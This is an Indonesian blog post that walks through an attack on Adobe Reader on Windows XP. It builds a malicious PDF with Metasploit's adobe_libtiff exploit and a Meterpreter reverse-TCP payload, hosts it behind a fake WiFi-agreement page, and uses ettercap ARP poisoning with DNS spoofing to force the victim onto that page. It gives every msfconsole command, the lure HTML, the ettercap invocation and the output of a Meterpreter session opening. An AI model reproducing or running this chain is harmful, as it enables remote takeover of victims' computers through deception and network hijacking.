Searching...
October 23, 2011
Sunday, October 23, 2011

[ADVANCE] Metasploit and Ettercap VS Adobe Reader

Jangan pernah jemu mempelajari penetration test. Kali ini saya akan berbagi, bagaimana cara mengeksploit windows XP dengan metasploit. Pada thread saya sebelumnya, saya telah menjelaskan tentang metasploit vs microsoft office word, dan kali ini giliran metasploit menghajar adobe reader. =)

Mengenai adobe reader, tentu saya membicarakan tentang file berekstensi .pdf kali ini kita akan membuat file PDF jahat, yang memicu vulnerability sebuah system.

Requirements:
1. metasploit
2. apache2
3. ettercap

Briefing:
1. Gunakan metasploit untuk membuat file PDF yang disisipkan PAYLOAD
2. Gunakan apache 2 untuk membuat halaman tipuan, agar korban masuk dalam jebakan untuk mengunduh file PDF tersebut.
3. Gunakan ettercap untuk mengalihkan halaman korban, ke index apache2 kita

Walkthrough:



1. Buka terminal, lalu masukan perintah
root@red-dragon:/# msfconsole

2. Langkah berikutnya, buat file PDF jahat dengan metasploit, kemudian lakukan pengaturan exploit.
msf > use exploit/windows/fileformat/adobe_libtiff
msf  exploit(adobe_libtiff) > show options

Module options (exploit/windows/fileformat/adobe_libtiff):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.pdf          yes       The file name.


Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)


msf  exploit(adobe_libtiff) > set FILENAME Tugas.pdf
FILENAME => Tugas.pdf
msf  exploit(adobe_libtiff) > setg OUTPUTPATH /root
OUTPUTPATH => /root
msf  exploit(adobe_libtiff) > setg PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(adobe_libtiff) > setg LHOST 192.168.56.101
LHOST => 192.168.56.101
msf  exploit(adobe_libtiff) > setg LPORT 4444
LPORT => 4444
msf  exploit(adobe_libtiff) > exploit

[*] Creating 'Tugas.pdf' file...
[*] Generated output file /root/.msf4/data/exploits/Tugas.pdf
msf  exploit(adobe_libtiff) >

3. Gunakan exploit multi handler untuk mengekploitasi korban ketika korban terpicu oleh exploit dan payload yang kita kirim.

msf  exploit(adobe_libtiff) > use exploit/multi/handler
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.56.101   yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.101:4444
[*] Starting the payload handler...

4. Copy file pdf tadi ke direktori apache 2

root@red-dragon:/# cp /root/.msf4/data/exploits/Tugas.pdf /var/www/

5. Edit index.html di /var/www/ seperti ini.

<html>
<head>
<title>Warning!!!</title>
</head>
<body>
<p align="center" class="style2"><u><b>Perhatian:</u></b>Anda harus membaca persetujuan penggunaan WiFi terlebih dahulu sebelum melanjutkan aktifitas browsing anda. Unduh persetujuan di bawah ini.</p>
<p align="center">
<input align="center" type="button" name="Button" value="Download persetujuan" onClick="window.open('/Tugas.pdf','download'); return false;"></p>
</body>
</html>

6. Gunakan ettercap untuk mengalihkan setiap halaman yang diakses korban ke alamat, kali ini kita akan menggunakan plug in dns_spoof =)

root@red-dragon:/# nano /usr/share/ettercap/etter.dns

Ubah menjadi seperti ini.
* A 192.168.56.101

Kemudian eksekusi ettercap dns_spoof untuk mengalihkan setiap halaman web yang diakses korban, ke index.html yang telah kita buat tadi. =)

root@red-dragon:/# ettercap -i wlan0 -T -q -P dns_spoof -M ARP-REMOTE /192.168.56.1/ /192.168.56.50/

Keterangan:
/192.168.56.1/ adalah IP address akses poin, ini adalah target 1
/192.168.56.50/ adalah IP address korban

7. Korban akan selalu menuju halaman index.html, APAPUN alamat web yang diakses, ia akan SELALU menuju ke halaman tersebut, dan setelah ia mengunduh file, kemudian membuka file tersebut, kita akan masuk ke dalam sesi meterpreter.

msf  exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.101:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.56.50
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.50:1908) at Mon Oct 23 11:14:55 2011

meterpreter >

Created by: red-dragon

Thanks to: metasploit [for your greatness]
ettercap [for your intercepting ability]
Yoshephine Handini [For your support by SMS =)]
blue-dragon [for idea]

0 comment:

Post a Comment

 
Back to top!